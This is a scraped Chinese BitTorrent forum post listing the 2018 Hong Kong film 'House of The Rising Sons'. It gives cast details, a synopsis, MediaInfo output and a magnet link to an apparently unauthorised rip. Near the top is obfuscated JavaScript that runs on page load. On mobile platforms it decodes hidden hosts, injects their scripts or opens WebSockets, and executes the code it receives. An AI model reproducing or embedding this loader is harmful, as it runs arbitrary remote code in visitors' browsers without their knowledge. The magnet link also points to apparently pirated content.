兄弟班[国粤语配音/中文字幕].House.of.The.Rising.Sons.2018.1080p.BluRay.x265.10bit.DTS.2Audio 6.73GB

版主小s 1月前 191

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 兄弟班 / House of The Rising Sons
◎年  代 2018
◎产  地 中国香港 / 中国大陆
◎类  别 剧情 / 喜剧
◎语  言 粤语 / 汉语普通话
◎上映日期 2018-07-20(中国大陆) / 2018-07-19(中国香港)
◎IMDb链接 https://www.imdb.com/title/tt8638638/
◎豆瓣评分 5.5/10 (1208人评价)
◎豆瓣链接 https://movie.douban.com/subject/26988003/
◎片  长 100分钟
◎导  演 陈友 Anthony Chan (id:1028948)
◎编  剧 陈友 Anthony Chan (id:1028948)
       彭美凤 Mei-Feng Peng (id:1392316)
       周汶儒 Man Yu Chow (id:1392317)
       召南 Siu Nam (id:1392318)
◎演  员 陈家乐 Carlos Chan (id:1275972)
       于湉 Tan Yu (id:1340458)
       王梓轩 Jonathan Wong Chee-hynn (id:1337843)
       吴鹤谦 Hokhim Ng (id:1392320)
       林耀声 Yiu-Sing Lam (id:1316133)
       邓加乐 Eugene Tang (id:1392319)
       任达华 Simon Yam (id:1031194)
       金燕玲 Elaine Jin (id:1280673)
       惠英红 Kara Wai Ying Hung (id:1016847)
       廖启智 Kai Chi Liu (id:1274268)
       谭咏麟 Alan Tam (id:1050648)
       钟镇涛 Kenny Bee (id:1033223)
       钱小豪 Siu-hou Chin (id:1005415)
       陈友 Anthony Chan (id:1028948)
       彭健新 Bennett Pang (id:1343321)
       叶智强 Danny Yip (id:1364173)
       禤嘉珍 Catherine Hun Ga-Jan (id:1280767)
       乐易玲 Virginia Lok (id:1403148)
       黄柏高 Paco Wong Pak Go (id:1343341)
       周绰华 Alvin Chow (id:1425958)
       陈友 Anthony Chan (id:1028948)
       邓东明 Tony Tang Tung-Ming (id:1336378)

◎标  签 香港 / 温拿乐队 / 传记 / 音乐 / 2018 / 友谊 / 励志 / 喜剧

◎简  介
  这是一个对新鲜事物充满好奇的时代,和所有故事的开头一样,坏男孩变好的原因永远是女孩,为了喜欢的女孩,海边烧烤摊堂口老大阿力在母亲包租婆的支持下,带着他的兄弟阿健、阿强开始了自己的音乐之路,同街区的阿友、阿伦、阿B也被坑蒙拐骗拉进团队,他们在斗殴和训练中增长友谊,父母们的集体反对、路人、邻居们的嘲笑更是激起了他们的好胜心。                                    
                                通过不懈努力终于从Loosers变成了Wynners,穷小子终于变成大明星,父母似乎也能理解这一切,但成员知名程度不一,资源分配不公等问题成为兄弟友情的最大考验,Wynners能否经受考验,保住兄弟真情谊.....

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 118850204373444505019297257201099288691 (0x5969B77CEC7E5AB97824E0A3507F3073)
  4. Complete name                            : House.o[email protected]BBQDDQ.COM.mkv
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 6.73 GiB
  8. Duration                                 : 1 h 40 min
  9. Overall bit rate                         : 9 607 kb/s
  10. Movie name                               : House of the Rising Sons
  11. Encoded date                             : UTC 2021-09-14 04:50:21
  12. Writing application                      : mkvmerge v61.0.0 ('So') 64-bit
  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  14. Cover                                    : Yes
  15. Attachments                              : cover.jpg / WenQuanWeiMiHei-1.ttf
  16. Video
  17. ID                                       : 1
  18. Format                                   : HEVC
  19. Format/Info                              : High Efficiency Video Coding
  20. Format profile                           : Main [email protected]@Main
  21. Codec ID                                 : V_MPEGH/ISO/HEVC
  22. Duration                                 : 1 h 40 min
  23. Bit rate                                 : 6 577 kb/s
  24. Width                                    : 1 920 pixels
  25. Height                                   : 800 pixels
  26. Display aspect ratio                     : 2.40:1
  27. Frame rate mode                          : Constant
  28. Frame rate                               : 24.000 FPS
  29. Color space                              : YUV
  30. Chroma subsampling                       : 4:2:0
  31. Bit depth                                : 10 bits
  32. Bits/(Pixel*Frame)                       : 0.178
  33. Stream size                              : 4.61 GiB (68%)
  34. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit
  35. Encoding settings                        : rc=crf / crf=17.0000 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.80 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x800 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass
  36. Default                                  : Yes
  37. Forced                                   : No
  38. Audio #1
  39. ID                                       : 2
  40. Format                                   : DTS
  41. Format/Info                              : Digital Theater Systems
  42. Codec ID                                 : A_DTS
  43. Duration                                 : 1 h 40 min
  44. Bit rate mode                            : Constant
  45. Bit rate                                 : 1 510 kb/s
  46. Channel(s)                               : 6 channels
  47. Channel layout                           : C L R Ls Rs LFE
  48. Sampling rate                            : 48.0 kHz
  49. Frame rate                               : 93.750 FPS (512 SPF)
  50. Bit depth                                : 24 bits
  51. Compression mode                         : Lossy
  52. Stream size                              : 1.06 GiB (16%)
  53. Title                                    : Mandarin
  54. Language                                 : Chinese
  55. Default                                  : Yes
  56. Forced                                   : No
  57. Audio #2
  58. ID                                       : 3
  59. Format                                   : DTS
  60. Format/Info                              : Digital Theater Systems
  61. Codec ID                                 : A_DTS
  62. Duration                                 : 1 h 40 min
  63. Bit rate mode                            : Constant
  64. Bit rate                                 : 1 510 kb/s
  65. Channel(s)                               : 6 channels
  66. Channel layout                           : C L R Ls Rs LFE
  67. Sampling rate                            : 48.0 kHz
  68. Frame rate                               : 93.750 FPS (512 SPF)
  69. Bit depth                                : 24 bits
  70. Compression mode                         : Lossy
  71. Stream size                              : 1.06 GiB (16%)
  72. Title                                    : Cantonese
  73. Language                                 : Chinese
  74. Default                                  : No
  75. Forced                                   : No
  76. Text #1
  77. ID                                       : 4
  78. Format                                   : ASS
  79. Codec ID                                 : S_TEXT/ASS
  80. Codec ID/Info                            : Advanced Sub Station Alpha
  81. Duration                                 : 1 h 34 min
  82. Bit rate                                 : 66 b/s
  83. Count of elements                        : 1105
  84. Compression mode                         : Lossless
  85. Stream size                              : 45.8 KiB (0%)
  86. Title                                    : chs
  87. Language                                 : Chinese
  88. Default                                  : Yes
  89. Forced                                   : No
  90. Text #2
  91. ID                                       : 5
  92. Format                                   : ASS
  93. Codec ID                                 : S_TEXT/ASS
  94. Codec ID/Info                            : Advanced Sub Station Alpha
  95. Duration                                 : 1 h 34 min
  96. Bit rate                                 : 66 b/s
  97. Count of elements                        : 1105
  98. Compression mode                         : Lossless
  99. Stream size                              : 45.8 KiB (0%)
  100. Title                                    : cht
  101. Language                                 : Chinese
  102. Default                                  : No
  103. Forced                                   : No
  104. Text #3
  105. ID                                       : 6
  106. Format                                   : UTF-8
  107. Codec ID                                 : S_TEXT/UTF8
  108. Codec ID/Info                            : UTF-8 Plain Text
  109. Duration                                 : 1 h 34 min
  110. Bit rate                                 : 32 b/s
  111. Count of elements                        : 1101
  112. Stream size                              : 22.3 KiB (0%)
  113. Title                                    : eng
  114. Language                                 : English
  115. Default                                  : No
  116. Forced                                   : No
  117. Menu
  118. 00:00:00.000                             : Chapter 01
  119. 00:08:50.125                             : Chapter 02
  120. 00:17:15.875                             : Chapter 03
  121. 00:23:33.500                             : Chapter 04
  122. 00:35:31.291                             : Chapter 05
  123. 00:41:13.166                             : Chapter 06
  124. 00:49:58.083                             : Chapter 07
  125. 00:58:21.083                             : Chapter 08
  126. 01:06:34.500                             : Chapter 09
  127. 01:16:58.458                             : Chapter 10
  128. 01:24:04.625                             : Chapter 11
  129. 01:30:41.166                             : Chapter 12


TAGS 剧情 喜剧

磁力链:
  • magnet:?xt=urn:btih:BF7867C808DFDD5C79CC5667F45E8170F1BB01AC
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖